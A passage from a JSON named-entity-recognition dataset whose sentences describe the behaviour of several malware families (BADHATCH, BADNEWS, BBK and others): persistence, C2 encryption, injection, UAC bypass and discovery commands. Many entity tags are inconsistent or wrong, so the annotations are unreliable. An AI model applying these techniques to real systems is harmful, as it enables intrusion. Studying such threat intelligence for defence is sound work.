"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "achieves", - "persistence", - "by", - "creating", - "a", - "shortcut", - "to", - "itself", - "in", - "the", - "CSIDL_STARTUP", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "its", - "initial", - "execution,", - "BACKSPACE", - "extracts", - "operating", - "system", - "information", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BACKSPACE", - "uses", - "HTTP", - "as", - "a", - "transport", - "to", - "communicate", - "with", - "its", - "command", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "can", - "direct", - "BACKSPACE", - "to", - "execute", - "from", - "the", - "command", - "line", - "on", - "infected", - "hosts,", - "or", - "have", - "BACKSPACE", - "create", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADCALL", - "disables", - "the", - "Windows", - "firewall", - "before", - "binding", - "to", - "a", - "port." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADCALL", - "modifies", - "the", - "firewall", - "Registry", - "key", - "<code>SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BADCALL", - "communicates", - "on", - "ports", - "443", - "and", - "8000", - "with", - "a", - "FakeTLS", - "method." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BADCALL", - "uses", - "a", - "FakeTLS", - "method", - "during", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADCALL", - "functions", - "as", - "a", - "proxy", - "server", - "between", - "the", - "victim", - "and", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADCALL", - "encrypts", - "C2", - "traffic", - "using", - "an", - "XOR/ADD", - "cipher." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "BADCALL", - "collects", - "the", - "computer", - "name", - "and", - "host", - "name", - "on", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADCALL", - "collects", - "the", - "network", - "adapter", - "information." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "compressed", - "data", - "using", - "the", - "aPLib", - "compression", - "library." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "uploaded", - "files", - "from", - "victims'", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "can", - "decode", - "shellcode", - "using", - "a", - "custom", - "rotating", - "XOR", - "cipher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "searched", - "for", - "files", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "download", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "been", - "distributed", - "via", - "spearphishing", - "campaigns", - "containing", - "malicious", - "Microsoft", - "Word", - "documents." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "captured", - "victim", - "computer", - "name,", - "memory", - "space,", - "and", - "CPU", - "details." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "captured", - "victim", - "IP", - "address", - "details." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADFLICK", - "has", - "delayed", - "communication", - "to", - "the", - "actor-controlled", - "IP", - "address", - "by", - "5", - "minutes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "beacon", - "to", - "a", - "hardcoded", - "C2", - "IP", - "address", - "using", - "TLS", - "encryption", - "every", - "5", - "minutes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "inject", - "itself", - "into", - "a", - "new", - "`svchost.exe", - "-k", - "netsvcs`", - "process", - "using", - "the", - "asynchronous", - "procedure", - "call", - "(APC)", - "queue." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "utilize", - "the", - "CMSTPLUA", - "COM", - "interface", - "and", - "the", - "SilentCleanup", - "task", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "malicious", - "PowerShell", - "commands", - "can", - "be", - "encoded", - "with", - "base64." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "`net.exe", - "group", - "\"domain", - "admins\"", - "/domain`", - "to", - "identify", - "Domain", - "Administrators." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "`nltest.exe", - "/domain_trusts`", - "to", - "discover", - "domain", - "trust", - "relationships", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "has", - "the", - "ability", - "to", - "execute", - "a", - "malicious", - "DLL", - "by", - "injecting", - "into", - "`explorer.exe`", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "has", - "an", - "embedded", - "second", - "stage", - "DLL", - "payload", - "within", - "the", - "first", - "stage", - "of", - "the", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "be", - "compressed", - "with", - "the", - "ApLib", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "exfiltrate", - "data", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "has", - "the", - "ability", - "to", - "delete", - "PowerShell", - "scripts", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "emulate", - "an", - "FTP", - "server", - "to", - "connect", - "to", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "has", - "the", - "ability", - "to", - "load", - "a", - "second", - "stage", - "malicious", - "DLL", - "file", - "onto", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "utilize", - "Native", - "API", - "functions", - "such", - "as,", - "`ToolHelp32`", - "and", - "`Rt1AdjustPrivilege`", - "to", - "enable", - "`SeDebugPrivilege`", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "check", - "for", - "open", - "ports", - "on", - "a", - "computer", - "by", - "establishing", - "a", - "TCP", - "connection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "check", - "a", - "user's", - "access", - "to", - "the", - "C$", - "share", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "perform", - "pass", - "the", - "hash", - "on", - "compromised", - "machines", - "with", - "x64", - "versions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "utilize", - "`powershell.exe`", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "retrieve", - "a", - "list", - "of", - "running", - "processes", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "inject", - "itself", - "into", - "an", - "existing", - "explorer.exe", - "process", - "by", - "using", - "`RtlCreateUserThread`." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "SOCKS4", - "and", - "SOCKS5", - "proxies", - "to", - "connect", - "to", - "actor-controlled", - "C2", - "servers.", - "BADHATCH", - "can", - "also", - "emulate", - "a", - "reverse", - "proxy", - "on", - "a", - "compromised", - "machine", - "to", - "connect", - "with", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "copy", - "a", - "large", - "byte", - "array", - "of", - "64-bit", - "shellcode", - "into", - "process", - "memory", - "and", - "execute", - "it", - "with", - "a", - "call", - "to", - "`CreateThread`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "a", - "PowerShell", - "object", - "such", - "as,", - "`System.Net.NetworkInformation.Ping`", - "to", - "ping", - "a", - "computer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "`schtasks.exe`", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "take", - "screenshots", - "and", - "send", - "them", - "to", - "an", - "actor-controlled", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "obtain", - "current", - "system", - "information", - "from", - "a", - "compromised", - "machine", - "such", - "as", - "the", - "`SHELL", - "PID`,", - "`PSVERSION`,", - "`HOSTNAME`,", - "`LOGONSERVER`,", - "`LASTBOOTUP`,", - "drive", - "information,", - "OS", - "type/version,", - "bitness,", - "and", - "hostname." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "execute", - "`netstat.exe", - "-f`", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "obtain", - "logged", - "user", - "information", - "from", - "a", - "compromised", - "machine", - "and", - "can", - "execute", - "the", - "command", - "`whoami.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "obtain", - "the", - "`DATETIME`", - "and", - "`UPTIME`", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "impersonate", - "a", - "`lsass.exe`", - "or", - "`vmtoolsd.exe`", - "token." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "over", - "port", - "443", - "to", - "communicate", - "with", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "be", - "utilized", - "to", - "abuse", - "`sslip.io`,", - "a", - "free", - "IP", - "to", - "domain", - "mapping", - "service,", - "as", - "part", - "of", - "actor-controlled", - "C2", - "channels." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "utilize", - "WMI", - "to", - "collect", - "system", - "information,", - "create", - "new", - "processes,", - "and", - "run", - "malicious", - "PowerShell", - "scripts", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADHATCH", - "can", - "use", - "WMI", - "event", - "subscriptions", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "monitors", - "USB", - "devices", - "and", - "copies", - "files", - "with", - "certain", - "extensions", - "to", - "a", - "predefined", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "can", - "use", - "multiple", - "C2", - "channels,", - "including", - "RSS", - "feeds,", - "Github,", - "forums,", - "and", - "blogs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "BADNEWS", - "typically", - "loads", - "its", - "DLL", - "file", - "into", - "a", - "legitimate", - "signed", - "Java", - "or", - "VMware", - "executable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "encrypting", - "C2", - "data,", - "BADNEWS", - "converts", - "it", - "into", - "a", - "hexadecimal", - "representation", - "and", - "then", - "encodes", - "it", - "into", - "base64." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "it", - "first", - "starts,", - "BADNEWS", - "crawls", - "the", - "victim's", - "local", - "drives", - "and", - "collects", - "documents", - "with", - "the", - "following", - "extensions:", - ".doc,", - ".docx,", - ".pdf,", - ".ppt,", - ".pptx,", - "and", - ".txt." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "When", - "it", - "first", - "starts,", - "BADNEWS", - "crawls", - "the", - "victim's", - "mapped", - "drives", - "and", - "collects", - "documents", - "with", - "the", - "following", - "extensions:", - ".doc,", - ".docx,", - ".pdf,", - ".ppt,", - ".pptx,", - "and", - ".txt." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BADNEWS", - "copies", - "files", - "with", - "certain", - "extensions", - "from", - "USB", - "devices", - "to", - "a", - "predefined", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "collects", - "C2", - "information", - "via", - "a", - "dead", - "drop", - "resolver." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "identifies", - "files", - "with", - "certain", - "extensions", - "from", - "USB", - "devices,", - "then", - "copies", - "them", - "to", - "a", - "predefined", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "is", - "capable", - "of", - "downloading", - "additional", - "files", - "through", - "C2", - "channels,", - "including", - "a", - "new", - "version", - "of", - "itself." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "is", - "sometimes", - "signed", - "with", - "an", - "invalid", - "Authenticode", - "certificate", - "in", - "an", - "apparent", - "effort", - "to", - "make", - "it", - "look", - "more", - "legitimate." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "it", - "first", - "starts,", - "BADNEWS", - "spawns", - "a", - "new", - "thread", - "to", - "log", - "keystrokes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "copies", - "documents", - "under", - "15MB", - "found", - "on", - "the", - "victim", - "system", - "to", - "is", - "the", - "user's", - "<code>%temp%\\SMB\\</code>", - "folder.", - "It", - "also", - "copies", - "files", - "from", - "USB", - "devices", - "to", - "a", - "predefined", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "attempts", - "to", - "hide", - "its", - "payloads", - "using", - "legitimate", - "filenames." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "has", - "a", - "command", - "to", - "download", - "an", - ".exe", - "and", - "execute", - "it", - "via", - "CreateProcess", - "API.", - "It", - "can", - "also", - "run", - "with", - "ShellExecute." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "checks", - "for", - "new", - "hard", - "drives", - "on", - "the", - "victim,", - "such", - "as", - "USB", - "devices,", - "by", - "listening", - "for", - "the", - "WM_DEVICECHANGE", - "window", - "message." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "has", - "a", - "command", - "to", - "download", - "an", - ".exe", - "and", - "use", - "process", - "hollowing", - "to", - "inject", - "it", - "into", - "a", - "new", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "installs", - "a", - "registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "creates", - "a", - "scheduled", - "task", - "to", - "establish", - "by", - "executing", - "a", - "malicious", - "payload", - "every", - "subsequent", - "minute." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "has", - "a", - "command", - "to", - "take", - "a", - "screenshot", - "and", - "send", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "encodes", - "C2", - "traffic", - "with", - "base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "encrypts", - "C2", - "data", - "with", - "a", - "ROR", - "by", - "3", - "and", - "an", - "XOR", - "by", - "0x23." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BADNEWS", - "establishes", - "a", - "backdoor", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BADNEWS", - "is", - "capable", - "of", - "executing", - "commands", - "via", - "cmd.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BBK", - "has", - "the", - "ability", - "to", - "decrypt", - "AES", - "encrypted", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "BBK", - "has", - "the", - "ability", - "to", - "download", - "files", - "from", - "C2", - "to", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBK", - "has", - "the", - "ability", - "to", - "use", - "the", - "<code>CreatePipe</code>", - "API", - "to", - "add", - "a", - "sub-process", - "for", - "execution", - "via", - "cmd." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BBK", - "has", - "the", - "ability", - "to", - "inject", - "shellcode", - "into", - "svchost.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BBK", - "can", - "extract", - "a", - "malicious", - "Portable", - "Executable", - "(PE)", - "from", - "a", - "photo." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBK", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBK", - "has", - "the", - "ability", - "to", - "use", - "cmd", - "to", - "run", - "a", - "Portable", - "Executable", - "(PE)", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "can", - "compress", - "data", - "with", - "ZLIB", - "prior", - "to", - "sending", - "it", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BBSRAT", - "has", - "been", - "seen", - "persisting", - "via", - "COM", - "hijacking", - "through", - "replacement", - "of", - "the", - "COM", - "object", - "for", - "MruPidlList", - "<code>{42aedc87-2188-41fd-b9a3-0c966feabec1}</code>", - "or", - "Microsoft", - "WBEM", - "New", - "Event", - "Subsystem", - "<code>{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}</code>", - "depending", - "on", - "the", - "system's", - "CPU", - "architecture." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", 